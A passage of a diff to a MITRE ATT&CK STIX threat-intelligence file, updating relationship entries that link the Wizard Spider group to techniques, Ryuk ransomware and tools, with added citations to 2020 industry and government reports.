"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--4f243ab6-812f-4fd3-9607-8d94409a94c1", + "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "type": "relationship", - "modified": "2020-05-15T18:52:17.533Z", - "created": "2020-05-13T15:28:06.633Z" + "created": "2020-05-13T15:28:06.633Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-15T18:52:17.533Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--43fabcba-66b6-45dc-b905-926f0a0a2bba", + "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "type": "relationship", - "modified": "2020-05-15T18:52:17.580Z", - "created": "2020-05-13T15:28:06.685Z" + "created": "2020-05-13T15:28:06.685Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.792Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--c51d9123-7f7e-41e6-8cf7-7c7dc4170ca0", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "type": "relationship", - "modified": "2020-05-15T18:52:17.609Z", - "created": "2020-05-13T16:45:50.311Z" + "created": "2020-05-13T16:45:50.311Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-15T18:52:17.609Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--93cd9a2c-48e3-4a95-90fb-6436afcfa7a8", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-05-13T16:45:50.316Z", - "created": "2020-05-13T16:45:50.316Z" + "created": "2020-05-13T16:45:50.316Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T16:45:50.316Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--2c54816e-5dd1-4723-99f5-29c80a2fc171", + "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "type": "relationship", - "modified": "2020-05-13T16:45:50.317Z", - "created": "2020-05-13T16:45:50.317Z" + "created": "2020-05-13T16:45:50.317Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T16:45:50.317Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "external_references": [ { "source_name": "FireEye Ryuk and Trickbot January 2019", - "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) used base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service.(Citation: FireEye Ryuk and Trickbot January 2019)", - "relationship_type": "uses", "id": "relationship--5a2c4561-48e4-4d51-8f00-ff470a18df32", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "type": "relationship", - "modified": "2020-05-15T18:52:17.642Z", - "created": "2020-05-13T17:16:11.074Z" + "created": "2020-05-13T17:16:11.074Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) used Base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service and PowerShell commands.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:02:41.068Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "external_references": [ { "source_name": "FireEye Ryuk and Trickbot January 2019", - "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" }, { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used AdFind.exe to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--df13cae2-4e20-4e89-ae60-6bd8b99e2342", + "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "type": "relationship", - "modified": "2020-05-18T21:26:08.307Z", - "created": "2020-05-13T17:16:11.123Z" + "created": "2020-05-13T17:16:11.123Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used AdFind.exe and nltest/dclist to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DFIR Ryuk's Return October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.886Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019) ", - "relationship_type": "uses", "id": "relationship--ad06b85a-a0df-41aa-8f45-f41504987918", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "type": "relationship", - "modified": "2020-05-15T18:52:17.644Z", - "created": "2020-05-13T17:16:11.136Z" + "created": "2020-05-13T17:16:11.136Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019) ", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-15T18:52:17.644Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -187032,46 +192326,111 @@ "created": "2020-05-14T14:38:22.650Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", "external_references": [ { "source_name": "CrowdStrike Ryuk January 2019", - "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", - "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" } ], - "description": "(Citation: CrowdStrike Ryuk January 2019)", - "relationship_type": "uses", "id": "relationship--6895e54e-3968-41a9-9013-a082cd46fa44", + "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", "type": "relationship", - "modified": "2020-05-14T14:40:26.221Z", - "created": "2020-05-14T14:40:26.221Z" + "created": "2020-05-14T14:40:26.221Z", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.866Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23", "external_references": [ { "source_name": "CrowdStrike Ryuk January 2019", - "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", - "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" } ], - "description": "(Citation: CrowdStrike Ryuk January 2019)", - "relationship_type": "uses", "id": "relationship--d64f970a-8003-41bf-9769-d849c12340ed", + "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23", "type": "relationship", - "modified": "2020-05-14T14:40:26.232Z", - "created": "2020-05-14T14:40:26.232Z" + "created": "2020-05-14T14:40:26.232Z", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.868Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -188557,46 +193916,76 @@ "created": "2020-05-15T17:03:12.918Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--1fa97951-8eba-4771-bc42-8084967f0c65", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "type": "relationship", - "modified": "2020-05-18T12:52:08.756Z", - "created": "2020-05-15T18:52:17.468Z" + "created": "2020-05-15T18:52:17.468Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery and to move laterally.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.935Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "external_references": [ { "source_name": "FireEye Ryuk and Trickbot January 2019", - "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). 